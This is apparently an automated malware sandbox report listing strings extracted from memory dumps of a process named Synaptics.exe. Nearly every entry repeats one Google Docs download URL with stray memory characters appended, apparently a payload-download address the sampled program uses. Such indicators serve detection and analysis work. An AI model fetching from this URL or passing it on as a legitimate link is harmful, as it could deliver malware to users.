                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.hu
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeQ
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadect.o
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeduca
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadefg
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadement
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadervi
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesynd
                              Source: Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetag
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.000000000067C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf/
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.cn
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.do
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg?p
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgeH
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgld
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.c
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog8
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogB=W
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149255188.000000000B6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh7
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhRC
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi9z
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiec
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion.c
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadisP
                              Source: Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj8
                              Source: Synaptics.exe, 00000003.00000002.1441338159.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjsp
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk&
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkdD
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkieNID=519=S
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl:y
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlFxOc
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlQ
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlQG
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.cQ
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.coE
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.coP
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlecl
                              Source: Synaptics.exe, 00000014.00000003.1935866964.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadload
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmP
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmdo
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.net
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnQ
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnalyt
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncisc
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-ca
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-caC
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnqo
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoTv
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa0
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoad
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleA
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoject
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolK
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolw
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonnec)0
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleA
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoutubI=Z
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp-
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp6
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpH
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpPK
                              Source: Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpany
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp-me
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps.cne
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadptcha
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadptimi2
